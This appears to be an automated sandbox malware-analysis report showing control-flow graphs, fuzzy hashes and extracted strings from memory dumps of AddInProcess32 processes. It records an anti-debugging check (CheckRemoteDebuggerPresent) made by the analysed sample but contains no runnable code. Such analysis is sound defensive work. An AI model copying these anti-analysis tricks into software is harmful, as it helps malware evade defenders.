                    • Instruction Fuzzy Hash: 84516274B0020A8FDB55EF64D994BBE77F6EB84340F148869D906DB384EB31DD458B90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 974 1d5301-1d538c CheckRemoteDebuggerPresent 977 1d538e-1d5394 974->977 978 1d5395-1d53d0 974->978 977->978
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001D537F
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504157002.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_1d0000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: 94b305a98e8606ad4c74af0b65e2c96f0a62ea8930e4fc796f51d20d3a96510c
                    • Instruction ID: 768cd64ac2a8a09d398979c52e075fe2f25dd3324f1f44561ce0c6d28393ccac
                    • Opcode Fuzzy Hash: 94b305a98e8606ad4c74af0b65e2c96f0a62ea8930e4fc796f51d20d3a96510c
                    • Instruction Fuzzy Hash: FB2136B18003598FCB00CF9AD484BEEBBF5AF49320F14845AE855A7351D778AA44CF61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 981 1d5308-1d538c CheckRemoteDebuggerPresent 983 1d538e-1d5394 981->983 984 1d5395-1d53d0 981->984 983->984
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001D537F
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504157002.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_1d0000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: e958ea50c19489962a4d109cf88a898b17e52c4b0843b0358456c305f40b6634
                    • Instruction ID: 3adb3a510bac5e821189711dca9d69f2b37f82e08a9ae12cbb63c8c1f04aeb80
                    • Opcode Fuzzy Hash: e958ea50c19489962a4d109cf88a898b17e52c4b0843b0358456c305f40b6634
                    • Instruction Fuzzy Hash: DF2125B1C002198FCB00CF9AD884BEEFBF5AF49320F14846AE859A7350D778A944CF61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 987 3f4f30-3f4f49 988 3f4f4b-3f4f4e 987->988 989 3f4f5b-3f4f5e 988->989 990 3f4f50-3f4f54 988->990 993 3f4f80-3f4f83 989->993 994 3f4f60-3f4f71 989->994 991 3f4f99-3f4fa2 990->991 992 3f4f56 990->992 995 3f507b-3f5085 991->995 996 3f4fa8-3f4fae 991->996 992->989 997 3f4f85-3f4f8f 993->997 998 3f4f90-3f4f93 993->998 1067 3f4f73 call 3f4f30 994->1067 1068 3f4f73 call 3f4f20 994->1068 999 3f50c8-3f50fd 996->999 1000 3f4fb4-3f4fd3 996->1000 998->991 1002 3f5086-3f5089 998->1002 1012 3f50ff-3f5102 999->1012 1016 3f506c-3f5075 1000->1016 1017 3f4fd9-3f5014 1000->1017 1003 3f50ac-3f50ae 1002->1003 1004 3f508b-3f50a7 1002->1004 1006 3f50b5-3f50b8 1003->1006 1007 3f50b0 1003->1007 1004->1003 1006->988 1011 3f50be-3f50c7 1006->1011 1007->1006 1008 3f4f79-3f4f7b 1008->993 1014 3f525e-3f5261 1012->1014 1015 3f5108-3f512e 1012->1015 1019 3f5284-3f5286 1014->1019 1020 3f5263-3f527f 1014->1020 1032 3f5135-3f5163 1015->1032 1016->995 1016->996 1036 3f501e-3f5028 1017->1036 1037 3f5016-3f5019 1017->1037 1022 3f528d-3f5290 1019->1022 1023 3f5288 1019->1023 1020->1019 1022->1012 1024 3f5296-3f529f 1022->1024 1023->1022 1044 3f51da-3f51fe 1032->1044 1045 3f5165-3f516f 1032->1045 1036->1016 1040 3f502a-3f503e 1036->1040 1037->1011 1046 3f504c 1040->1046 1047 3f5040-3f504a 1040->1047 1058 3f5208 1044->1058 1059 3f5200 1044->1059 1053 3f5187-3f51d8 1045->1053 1054 3f5171-3f5177 1045->1054 1049 3f5051-3f5053 1046->1049 1047->1049 1051 3f505f-3f506a 1049->1051 1052 3f5055-3f5058 1049->1052 1051->1016 1051->1040 1052->1051 1053->1044 1053->1045 1056 3f517b-3f517d 1054->1056 1057 3f5179 1054->1057 1056->1053 1057->1053 1058->1014 1059->1058 1067->1008 1068->1008
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: PHp
                    • API String ID: 0-2495607638
                    • Opcode ID: 34f40dc5f2ba55d6ca534348524ffd97d397612477bed7ad982daa19278c1d72
                    • Instruction ID: 00478ef3e30266724ead56c509bbeb9c86787120c686bde8e57a3e12f69fc817
                    • Opcode Fuzzy Hash: 34f40dc5f2ba55d6ca534348524ffd97d397612477bed7ad982daa19278c1d72
                    • Instruction Fuzzy Hash: D0811531B002098FCF16AB64E8547BEB7A6EBC8310F258969E606DB385DF35DD4687D0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1354 3f2050-3f207f 1355 3f2081-3f2084 1354->1355 1356 3f20a7-3f20aa 1355->1356 1357 3f2086-3f20a2 1355->1357 1358 3f2157-3f215a 1356->1358 1359 3f20b0-3f20bc 1356->1359 1357->1356 1360 3f2390-3f2392 1358->1360 1361 3f2160-3f216f 1358->1361 1363 3f20c7-3f20c9 1359->1363 1364 3f2399-3f239c 1360->1364 1365 3f2394 1360->1365 1375 3f218e-3f21d2 1361->1375 1376 3f2171-3f218c 1361->1376 1367 3f20cb-3f20d1 1363->1367 1368 3f20e1-3f20e5 1363->1368 1364->1355 1366 3f23a2-3f23ab 1364->1366 1365->1364 1371 3f20d5-3f20d7 1367->1371 1372 3f20d3 1367->1372 1373 3f20e7-3f20f1 1368->1373 1374 3f20f3 1368->1374 1371->1368 1372->1368 1377 3f20f8-3f20fa 1373->1377 1374->1377 1382 3f21d8-3f21e9 1375->1382 1383 3f2364-3f237a 1375->1383 1376->1375 1379 3f20fc-3f20ff 1377->1379 1380 3f2111-3f214a 1377->1380 1379->1366 1380->1361 1397 3f214c-3f2156 1380->1397 1388 3f234f-3f235e 1382->1388 1389 3f21ef-3f220c 1382->1389 1383->1360 1388->1382 1388->1383 1389->1388 1398 3f2212-3f2309 1389->1398 1421 3f230b-3f2315 1398->1421 1422 3f2317 1398->1422 1423 3f231c-3f231e 1421->1423 1422->1423 1423->1388 1424 3f2320-3f2325 1423->1424 1425 3f2327-3f2331 1424->1425 1426 3f2333 1424->1426 1427 3f2338-3f233a 1425->1427 1426->1427 1427->1388 1428 3f233c-3f2348 1427->1428 1428->1388
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: 2b9ed626633f063f0e41a46a4a8d4fb8826cfe4b931ef04c80cd7e5d1145f0e8
                    • Instruction ID: a92a8d0e051d7eeccf04a3a66f8037e639f7db2d876b3324a3d9fb889ee9a863
                    • Opcode Fuzzy Hash: 2b9ed626633f063f0e41a46a4a8d4fb8826cfe4b931ef04c80cd7e5d1145f0e8
                    • Instruction Fuzzy Hash: 88115532604349DFCF269A60EC81ABBBB64EB80310F15446EEE01D7241EB75DE59C780
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a162976ae6cbf0f96c35cbec22c1041d1d4466935cd98fcf2b75af30bb6e4e5c
                    • Instruction ID: 55f75d62124d33b96c8187c99dd74f2f4e4cb77e3186a0eca68cfec7dfa07b05
                    • Opcode Fuzzy Hash: a162976ae6cbf0f96c35cbec22c1041d1d4466935cd98fcf2b75af30bb6e4e5c
                    • Instruction Fuzzy Hash: 36814F70A01254CFDB1AEF64E454BAEB7B3EF98304F648529E40597399DB35EC82CB40
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4a381712cfa2f465fc8a72cb7307238ea762b7dd05108301a09d0b4dfd2be071
                    • Instruction ID: 86d06d20c4feef4a9587a59befebdffbc15b737d636c60125e3873ec031cb34c
                    • Opcode Fuzzy Hash: 4a381712cfa2f465fc8a72cb7307238ea762b7dd05108301a09d0b4dfd2be071
                    • Instruction Fuzzy Hash: 16210430B012499BCF19DA68F8547AEBBF6EF84310F158829E504EB342EB31ED448B80
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504056652.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_18d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b7d92f307a125cfc2905cb53d2b633d40ad9e34c9989cf427c1d30beeb2e6e3
                    • Instruction ID: 7dd8910d9289ad4065159003800ad1ca79add362d5f98843a0f3ad477cfb23f0
                    • Opcode Fuzzy Hash: 3b7d92f307a125cfc2905cb53d2b633d40ad9e34c9989cf427c1d30beeb2e6e3
                    • Instruction Fuzzy Hash: B721B075604340EFDB15EF14E8C4B26BB65EB84314F34C5A9E8494B286C736D947CFA1
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0aaad4a169dbbf8619b2970377b1f2c30e2271dfd8b02b7c5b50fe3bfea23b8e
                    • Instruction ID: ad468aef6a8efefc99acc3a0de47e266761c47e0992a42b575f9139296f0fd6d
                    • Opcode Fuzzy Hash: 0aaad4a169dbbf8619b2970377b1f2c30e2271dfd8b02b7c5b50fe3bfea23b8e
                    • Instruction Fuzzy Hash: 2921C074A01209CBDB12EF94E585AAEB7B2FF88315F298126E905A7745D730EC82CF50
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504056652.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_18d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                    • Instruction ID: cab5607b511fb3ce077a501e6ac4f9d4bcbfdae65679ef6d5c00ec715593974c
                    • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                    • Instruction Fuzzy Hash: 55118E75504380DFDB11DF14E5C4B15BB61EB44314F24C6A9E8494B696C33AD94ACFA1
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6468ace2d5c426cee0c859b8377e35482bebde97a5f115375b0135550c136b8c
                    • Instruction ID: c20c1f3b57b982ce6e924094ff3b0e1ff92dd9dbe5c1d98e6556e4a3534294a8
                    • Opcode Fuzzy Hash: 6468ace2d5c426cee0c859b8377e35482bebde97a5f115375b0135550c136b8c
                    • Instruction Fuzzy Hash: C20178313043A95FC7236239EC1437F3B96EFD2310B4A0D76E044CB2A1DA29CE0683A1
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8fb4239484471b1209fe1bfc93fc3d41566bbd33ebdc12b1d7fb05a94e616676
                    • Instruction ID: e3102cabc12f588386cd8fea0057c1a307ed8206ea81c39032bfedc7c1cf1104
                    • Opcode Fuzzy Hash: 8fb4239484471b1209fe1bfc93fc3d41566bbd33ebdc12b1d7fb05a94e616676
                    • Instruction Fuzzy Hash: A70181357002180BDB66AA68E494B3F73DAEB89710F108C29E60ACB354EA21DC524784
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e94d4ef4dac643ce9d8e7392cfa461f904b8706332cf6709fb61b7f843bc8b2
                    • Instruction ID: 224a8c7be3f93ee345fdd6f9aa3d9cb7360ae8dd7b1fa34ee8163931e13d0fbd
                    • Opcode Fuzzy Hash: 9e94d4ef4dac643ce9d8e7392cfa461f904b8706332cf6709fb61b7f843bc8b2
                    • Instruction Fuzzy Hash: DDF04634B042489FDF22DAA4FCAC7EBBBA1D784324F00452AE609D7290C221D9558790
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                    • API String ID: 0-1868313790
                    • Opcode ID: ed6e55bfeac16c615e00a9a15b004287562fc260ffa0f55ffc1553d63683ab44
                    • Instruction ID: d4f88c81b65b6d331c897242be3549856dcd4011e95304656ab6be51e91c489e
                    • Opcode Fuzzy Hash: ed6e55bfeac16c615e00a9a15b004287562fc260ffa0f55ffc1553d63683ab44
                    • Instruction Fuzzy Hash: BA123B30A01219CFDB29DF65D854BAEB7B2BF89300F25856AD50AAB355DB30DD85CF80
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p
                    • API String ID: 0-3121760203
                    • Opcode ID: a0ba80e713f20d1e25890db6ccfbd682cfb8f347dd0406284a5d9782bba6aee0
                    • Instruction ID: f223a38a3033c9fd8f5c4a3144c1718685025f827a09963f1ed6d402f0266578
                    • Opcode Fuzzy Hash: a0ba80e713f20d1e25890db6ccfbd682cfb8f347dd0406284a5d9782bba6aee0
                    • Instruction Fuzzy Hash: A1B15D30A01218CFDB2AEFA4D5957AEB7B2EF98300F658429E405DB355DB75DC86CB80
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: LRp$LRp$$p$$p
                    • API String ID: 0-727438728
                    • Opcode ID: 49ef2a4c02f20e842e7535a8aa6b44b6933a1be2b32b87b60bc73dcd50991cd7
                    • Instruction ID: 694eb1697d3fa37ffc8864c1956fcdc225d14480853ba23d1fb9fce73e25970d
                    • Opcode Fuzzy Hash: 49ef2a4c02f20e842e7535a8aa6b44b6933a1be2b32b87b60bc73dcd50991cd7
                    • Instruction Fuzzy Hash: 0C519E30B00305DFDB19EB68E845A7FB7A6EF88300F148969E5169B395DB35EC45CB50

                    Execution Graph

                    Execution Coverage:10.9%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 12114 255308 12115 25534c CheckRemoteDebuggerPresent 12114->12115 12116 25538e 12115->12116

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 695 661d60-661d7e 696 661d80-661d83 695->696 697 661da6-661da9 696->697 698 661d85-661da1 696->698 699 661dca-661dcd 697->699 700 661dab-661dc5 697->700 698->697 702 661dcf-661dd9 699->702 703 661dda-661ddd 699->703 700->699 704 661df4-661df6 703->704 705 661ddf-661ded 703->705 707 661dfd-661e00 704->707 708 661df8 704->708 711 661e06-661e1c 705->711 713 661def 705->713 707->696 707->711 708->707 715 661e22-661e2b 711->715 716 662038-662042 711->716 713->704 717 662043-66207f 715->717 718 661e31-661e4e 715->718 721 662081-662084 717->721 725 661e54-661e7c 718->725 726 662025-662032 718->726 723 662086-6620a2 721->723 724 6620a7-6620aa 721->724 723->724 727 662157-66215a 724->727 728 6620b0-6620bc 724->728 725->726 749 661e82-661e8b 725->749 726->715 726->716 729 662390-662392 727->729 730 662160-66216f 727->730 735 6620c7-6620c9 728->735 732 662394 729->732 733 662399-66239c 729->733 743 662171-66218c 730->743 744 66218e-6621d2 730->744 732->733 733->721 737 6623a2-6623ab 733->737 739 6620e1-6620e5 735->739 740 6620cb-6620d1 735->740 741 6620e7-6620f1 739->741 742 6620f3 739->742 746 6620d5-6620d7 740->746 747 6620d3 740->747 748 6620f8-6620fa 741->748 742->748 743->744 755 662364-66237a 744->755 756 6621d8-6621e9 744->756 746->739 747->739 750 662111-66214a 748->750 751 6620fc-6620ff 748->751 749->717 753 661e91-661ead 749->753 750->730 777 66214c-662156 750->777 751->737 761 662013-66201f 753->761 762 661eb3-661edd 753->762 755->729 766 66234f-66235e 756->766 767 6621ef-66220c 756->767 761->726 761->749 778 661ee3-661f0b 762->778 779 662009-66200e 762->779 766->755 766->756 767->766 776 662212-662309 767->776 826 662317 776->826 827 66230b-662315 776->827 778->779 785 661f11-661f3f 778->785 779->761 785->779 791 661f45-661f4e 785->791 791->779 792 661f54-661f86 791->792 800 661f91-661fad 792->800 801 661f88-661f8c 792->801 800->761 803 661faf-662007 800->803 801->779 802 661f8e 801->802 802->800 803->761 828 66231c-66231e 826->828 827->828 828->766 829 662320-662325 828->829 830 662327-662331 829->830 831 662333 829->831 832 662338-66233a 830->832 831->832 832->766 833 66233c-662348 832->833 833->766
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 0a9d61d4d9aea94c301a972df04757a9d285c86f33a9d75a2072bcd32d14c958
                    • Instruction ID: a999ef1e3d0ada7430e68882aef6d47c459aca8fb0c659756d55e87d9804b8d5
                    • Opcode Fuzzy Hash: 0a9d61d4d9aea94c301a972df04757a9d285c86f33a9d75a2072bcd32d14c958
                    • Instruction Fuzzy Hash: EF028E30B006069FCB29DB68D5947AEB7E3EF88310F248569D805DB395DB35ED86CB90
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 01bc6181f284599f0efc4bcfd9fdcfd4c3fe44e8af182aa620818cbe6ca52876
                    • Instruction ID: 13990177dc6356fd9df401f05915143584873ce1b8e5747b34dc2d3aea36357e
                    • Opcode Fuzzy Hash: 01bc6181f284599f0efc4bcfd9fdcfd4c3fe44e8af182aa620818cbe6ca52876
                    • Instruction Fuzzy Hash: 4C629D34A002049FEB25DB68D594BAEB7F3EF88314F148469E406DB395DB35ED86CB90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 661070-66108c 136 66108e-661091 135->136 137 6610b4-6610b6 136->137 138 661093-6610af 136->138 139 6610bd-6610c0 137->139 140 6610b8 137->140 138->137 139->136 141 6610c2-6611dd 139->141 140->139 161 6611df-6611e3 141->161 162 6611e9-6611f8 141->162 161->162 163 661656-661660 162->163 164 6611fe-661207 162->164 165 66164c-661651 164->165 166 66120d-661218 164->166 165->163 167 661626-661632 166->167 168 66121e-661235 166->168 167->164 170 661638 167->170 168->167 172 66123b-661244 168->172 170->163 172->165 173 66124a-66126f 172->173 176 661614-661620 173->176 177 661275-66128c 173->177 176->167 176->172 177->176 179 661292-66129b 177->179 179->165 180 6612a1-6612bb 179->180 182 6612c2-6612c4 180->182 183 6612c6-6612d6 182->183 184 66130e-661321 182->184 189 661326-661359 183->189 190 6612d8-6612e8 183->190 185 6615f0-6615f4 184->185 187 6615f6 185->187 188 6615ff-661600 185->188 187->188 188->176 199 66139b-6613ab 189->199 200 66135b-661399 189->200 190->189 194 6612ea-6612fa 190->194 194->189 198 6612fc-66130c 194->198 198->184 198->189 204 6613c3-6613d8 199->204 205 6613ad-6613b3 199->205 210 6613da-661441 200->210 204->210 206 6613b7-6613b9 205->206 207 6613b5 205->207 206->204 207->204 219 661447-66144a 210->219 220 6614f3-661513 210->220 221 661450-661460 219->221 222 6615d1-6615d6 219->222 229 661515-661556 220->229 230 66156b-661577 220->230 227 661466-6614bb 221->227 228 6614e9-6614ed 221->228 231 6615db-6615ee 222->231 227->222 254 6614c1-6614db 227->254 228->219 228->220 229->222 252 661558-661569 229->252 235 66158f-6615a4 230->235 236 661579-66157f 230->236 231->185 244 6615a6-6615cf 235->244 238 661583-661585 236->238 239 661581 236->239 238->235 239->235 244->231 252->244 254->222 257 6614e1-6614e7 254->257 257->220
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p
                    • API String ID: 0-3402276426
                    • Opcode ID: beda71d309ce5ff1f7c1603e6dfbf6a81cec3f8b83ca520d4551b1ccf2843e3a
                    • Instruction ID: 7662e4d31235c60666f8aaf432c4baa18f9222f287e06c9961eb4a2633351e48
                    • Opcode Fuzzy Hash: beda71d309ce5ff1f7c1603e6dfbf6a81cec3f8b83ca520d4551b1ccf2843e3a
                    • Instruction Fuzzy Hash: DCF14E74B002049FCB19EF68D495A6EB7B3EF89301F288569D8069B359CB31DC96CF90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 835 663138-66316a 836 663190-6631ae 835->836 837 66316c-66318b 835->837 842 6631c6-6631dc 836->842 843 6631b0-6631b8 836->843 837->836 846 6631e7-6631e9 842->846 843->842 847 663201-663272 846->847 848 6631eb-6631f3 846->848 858 663274-663297 847->858 859 66329e-6632ba 847->859 848->847 858->859 864 6632e6-663301 859->864 865 6632bc-6632df 859->865 870 663303-663325 864->870 871 66332c-663347 864->871 865->864 870->871 876 663372-663a71 871->876 877 663349-66336b 871->877 877->876
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 6511702d6ac123bd883a33ea59961640e17289b9257f40a9446a30bbaf95a438
                    • Instruction ID: fd9d8f54a2262e5a8d8d871fa6d58286345cac9c9e04e07398a1dd2abba3a78b
                    • Opcode Fuzzy Hash: 6511702d6ac123bd883a33ea59961640e17289b9257f40a9446a30bbaf95a438
                    • Instruction Fuzzy Hash: CD515334B006159FDB68DB68D960BAE73F7EB98344F148469C806EB384EF70DD558B50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 965 255308-25538c CheckRemoteDebuggerPresent 967 255395-2553d0 965->967 968 25538e-255394 965->968 968->967
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0025537F
                    Memory Dump Source
                    • Source File: 0000000D.00000002.515744964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_250000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: e3f72670dcafd1c41058cda38756b93566807c7947146b5d68766c8631fef56c
                    • Instruction ID: 88d2f0900350df75bcf695f2f6e709f21d73a41990fe1aee4fabf90a06897bef
                    • Opcode Fuzzy Hash: e3f72670dcafd1c41058cda38756b93566807c7947146b5d68766c8631fef56c
                    • Instruction Fuzzy Hash: 7B2128B1C002198FCB00CF9AD484BEEFBF4AF49320F14845AD859A7250D778A948CF65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 971 664f30-664f49 972 664f4b-664f4e 971->972 973 664f50-664f54 972->973 974 664f5b-664f5e 972->974 975 664f56 973->975 976 664f99-664fa2 973->976 977 664f80-664f83 974->977 978 664f60-664f71 974->978 975->974 979 66507b-665085 976->979 980 664fa8-664fae 976->980 981 664f85-664f8f 977->981 982 664f90-664f93 977->982 1051 664f73 call 664f20 978->1051 1052 664f73 call 664f30 978->1052 985 664fb4-664fd3 980->985 986 6650c8-6650fd 980->986 982->976 984 665086-665089 982->984 987 6650ac-6650ae 984->987 988 66508b-6650a7 984->988 1001 66506c-665075 985->1001 1002 664fd9-665014 985->1002 996 6650ff-665102 986->996 989 6650b5-6650b8 987->989 990 6650b0 987->990 988->987 989->972 995 6650be-6650c7 989->995 990->989 992 664f79-664f7b 992->977 998 66525e-665261 996->998 999 665108-66512e 996->999 1003 665284-665286 998->1003 1004 665263-66527f 998->1004 1016 665135-665163 999->1016 1001->979 1001->980 1020 665016-665019 1002->1020 1021 66501e-665028 1002->1021 1006 66528d-665290 1003->1006 1007 665288 1003->1007 1004->1003 1006->996 1008 665296-66529f 1006->1008 1007->1006 1030 665165-66516f 1016->1030 1031 6651da-6651fe 1016->1031 1020->995 1021->1001 1024 66502a-66503e 1021->1024 1028 665040-66504a 1024->1028 1029 66504c 1024->1029 1033 665051-665053 1028->1033 1029->1033 1038 665187-6651d8 1030->1038 1039 665171-665177 1030->1039 1042 665200 1031->1042 1043 665208 1031->1043 1034 665055-665058 1033->1034 1035 66505f-66506a 1033->1035 1034->1035 1035->1001 1035->1024 1038->1030 1038->1031 1040 66517b-66517d 1039->1040 1041 665179 1039->1041 1040->1038 1041->1038 1042->1043 1043->998 1051->992 1052->992
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: PHp
                    • API String ID: 0-2495607638
                    • Opcode ID: d07ac3080819488a5f164b2bc1f07157e0b29e79c107bf83dcd6fd845eb67fbd
                    • Instruction ID: 710158dc3576637a5efe5949a31956f1612006465b2a1e68701cd805773a8529
                    • Opcode Fuzzy Hash: d07ac3080819488a5f164b2bc1f07157e0b29e79c107bf83dcd6fd845eb67fbd
                    • Instruction Fuzzy Hash: 14811331B006048FDF18AB68E4557AEB7A7EBC8310F248469D807DB345DF35DD8687A1

                    Control-flow Graph

                    • Executed
                    • Not Executed
